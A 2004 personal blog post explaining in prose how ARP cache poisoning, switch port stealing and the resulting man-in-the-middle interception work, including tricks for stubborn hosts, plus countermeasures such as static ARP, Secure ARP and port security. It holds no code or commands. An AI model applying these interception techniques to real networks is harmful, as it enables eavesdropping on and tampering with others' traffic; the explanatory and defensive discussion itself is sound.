Tuesday, November 09, 2004

ARP poisoning, port stealing and MITM.

ARP poisoning:

As explained here, one can craft ARP packets with some destination IP and the attacker MAC address to poison an ARP cache: the existing ARP entry matching the destination IP address is updated with your MAC address. Next time a packet flies to the destination IP address, it gets to you -- you can use packet forwarding to still deliver the packet to destination. Note that since ARP cache entries expires, it may be necessary to send the bogus ARP packet periodically. Different type of ARP messages might have to be used to poison ARP caches of different type of hardware/OS peers.

The ARP protocol is stateless. Most OS update their caches with ARP replies without having ever solicited one. Some, like Solaris, are a little tougher but in this case, one can trigger an ARP request by creating a spoofed ICMP request: you ping a destination with IP and the attacker's MAC to force an ARP request, after what you send the fake ARP reply. Circumventing ARP poisoning can be done through active/passive monitoring, static ARP (not flexible) or Secure ARP.

MITM Attack:

Sniffing would get you there in terms of observing traffic, but it doesn't give you the ability to prevent host IP from seeing its traffic before you do. What you achieve effectively is a MITM: Man In The Middle attack where one can sit listening and relaying traffic between two hosts without the hosts being able to tell. As for the actions the MITM can take, they're numerous: injection (commands, insertion of malicious code in JS, etc... -- sequence number modification required of course), key manipulation, filtering, etc...

Port stealing:

This ARP poisoning based MITM attack works better on a local network segment. In order for it to work in a switched environment, you need to steal the switch ports by sending to the switch packets with the relevant MACs of the hosts you want to intercept traffic from so that the switch modifies its CAM table. Once the traffic is captured, you need to reset the CAM entries to be able to resend traffic to its rightfull destination -- this has to be done for every packet, that's a lot of work and traffic might be dropped. Port stealing can be circumvented by using port security on the switch.

More info on that here. here and here.

Of course, all this rogue packet crafting is done using libnet.

posted by apbianco (毕安和) @ 1:53 PM   0 comments  

0 Comments:

Post a Comment

<< Home

Home